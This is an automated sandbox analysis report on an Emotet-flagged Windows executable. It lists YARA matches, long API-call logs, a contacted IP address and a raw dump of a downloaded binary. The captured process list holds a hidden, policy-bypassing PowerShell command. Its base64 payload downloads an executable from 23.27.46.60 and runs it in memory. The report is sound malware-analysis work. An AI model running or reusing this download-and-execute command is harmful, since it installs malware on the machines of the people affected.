popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

rocktrainingss.exe

Emotet Gen1 Generic Malware Malicious Library Antivirus UPX PE File PE64 CAB
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us March 3, 2025, 2:42 p.m. March 3, 2025, 2:49 p.m.
Size 156.0KB
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 5cae6ec63c10893a71f48917fd993e3f
SHA256 370e0cedd9a4f6ab338cfff223f9afce18e1e3b7555558ecfad469279d76573e
CRC32 370656A9
ssdeep 1536:L2poznR4j6ej3Zi2iLOZoMmX1OdM/s5gV/ae/XD6BqExV4Lkrzd:LMobR7ezAjLOZvmX1e5YBL4xV4wrzd
PDB Path wextract.pdb
Yara
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • IsPE64 - (no description)
  • Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet
  • CAB_file_format - CAB archive file
  • Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet
  • UPX_Zero - UPX packed file

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
23.27.46.60 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

 buffer: '■' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x000000000000000b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000327a10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003aef60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003aef60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003aef60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003aefd0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003aefd0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af2e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af2e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af2e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af2e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af350
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af350
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af350
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af0b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af0b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af0b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af0b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af0b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af0b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af0b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af0b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003afac0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003afac0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003afac0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003afb30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003afb30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003afa50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003afa50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003afb30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003afb30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003afb30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000327850
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000327850
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000327850
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000327850
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b57d590
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b57d590
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000327930
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000327930
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000327930
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000327930
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
pdb_path wextract.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
resource name AVI
suspicious_features Connection to IP address suspicious_request GET http://23.27.46.60/a0001/0228/rocktraining.exe
request GET http://23.27.46.60/a0001/0228/rocktraining.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2124
region_size: 2293760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002600000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2124
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000027b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3471000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36ee000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36ee000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36ef000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36ef000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36ef000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36ef000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36ef000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36ef000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36ef000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36ef000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36f0000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36f0000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36f0000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36f0000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36f0000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36f1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36f1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36f1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36f1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36ee000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00012000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2124
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2124
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00002000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2124
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000027b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2124
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000027b4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00013000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00014000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00102000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000dd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000cb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00015000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00150000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00003000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00016000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00103000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0000a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00017000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2124
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000027b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\rocktrainings.bat
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -WindowStyle Hidden -ep bypass -nop -Command "& {Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHdjPU5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQKJHdjLkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQ7IFdpbmRvd3MgTlQgMTAuMDsgZW4tVVMpIFdpbmRvd3NQb3dlclNoZWxsLzUuMS4xNzEzNC4xMTInKQokYnl0ZXM9JHdjLkRvd25sb2FkRGF0YSgnaHR0cDovLzIzLjI3LjQ2LjYwL2EwMDAxLzAyMjgvcm9ja3RyYWluaW5nLmV4ZScpCiRhc3NlbT1bUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJ5dGVzKQokYXNzZW0uRW50cnlQb2ludC5JbnZva2UoJG51bGwsJG51bGwp')))}"
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2128
thread_handle: 0x000000000000006c
process_identifier: 2124
current_directory: C:\Users\test22\AppData\Local\Temp\IXP000.TMP
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -WindowStyle Hidden -ep bypass -nop -Command "& {Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHdjPU5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQKJHdjLkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQ7IFdpbmRvd3MgTlQgMTAuMDsgZW4tVVMpIFdpbmRvd3NQb3dlclNoZWxsLzUuMS4xNzEzNC4xMTInKQokYnl0ZXM9JHdjLkRvd25sb2FkRGF0YSgnaHR0cDovLzIzLjI3LjQ2LjYwL2EwMDAxLzAyMjgvcm9ja3RyYWluaW5nLmV4ZScpCiRhc3NlbT1bUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJ5dGVzKQokYXNzZW0uRW50cnlQb2ludC5JbnZva2UoJG51bGwsJG51bGwp')))}"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000068
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received HTTP/1.1 200 OK Date: Mon, 03 Mar 2025 05:47:34 GMT Server: Apache/2.4.58 (Ubuntu) Last-Modified: Fri, 28 Feb 2025 09:52:00 GMT ETag: "1d7400-62f30c2019678" Accept-Ranges: bytes Content-Length: 1930240 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELì†Ágà jŽˆ  @ à`…@ˆK ¸À  H.text”h j `.rsrc¸ l@@.reloc Àr@BpˆH¬klä*(*0£ þ8þ EoH28j|(+ ~í{ì9Äÿÿÿ& 8¹ÿÿÿ( } 8£ÿÿÿ} ~í{Ü9‡ÿÿÿ& 8|ÿÿÿ|( *0z þ8þ E18,*(o  ~í{È9Éÿÿÿ& 8¾ÿÿÿ( ~í{Æ:£ÿÿÿ& 8˜ÿÿÿ&~þ*~*0/( }}|(+|( *0/( } } | (+| ( *0  þ8þ E 8›($ o%  ~í{Ì9& 8þ E8ÝW& ~í{»:& 8þ E8s# z ~í{é:^ÿÿÿ& 8Sÿÿÿ*%Ch8&~þ*~*0¥  þ8þ E+R8&s ~í{ö:Ïÿÿÿ& 8Äÿÿÿ} ~í{À:¨ÿÿÿ& 8ÿÿÿo& þs' (+%() :8s# z*&~þ*~*0Î  þ8þ E8*o- :s# zo. & ~í{°9& 8þ E8Ý­ÿÿÿ& ~í{ú9& 8þ E8s# z ~í{:Oÿÿÿ& 8Dÿÿÿ&Qw8&~þ*~*(* *0” þ8þ EBk8r­pÐ (/ o0 s1 € ~í{Æ:¸ÿÿÿ& 8­ÿÿÿ~: ~í{Å:ÿÿÿ& 8„ÿÿÿ~*~*€*j(#rãp~o2 t*&~þ*~*0”  þ8þ E:085~ %:@& ~í{:Êÿÿÿ& 8¿ÿÿÿ(,*~þes3 %€  ~í{î:‰ÿÿÿ& 8~ÿÿÿ&(,*0”  þ8þ E:085~!%:@& ~í{Æ9Êÿÿÿ& 8¿ÿÿÿ(,*~þfs3 %€! ~í{Í:‰ÿÿÿ& 8~ÿÿÿ0¤ sƒ }>=r÷prps4 z<r_prƒps4 z{>: rÝps5 z(ã }? ÿÿÿY> ÿÿÿ8X (ã }@þ„s6 {?{@sµ *0™ þ8þ E?8:(0*~"%986& ~í{ú:»ÿÿÿ& 8°ÿÿÿ~
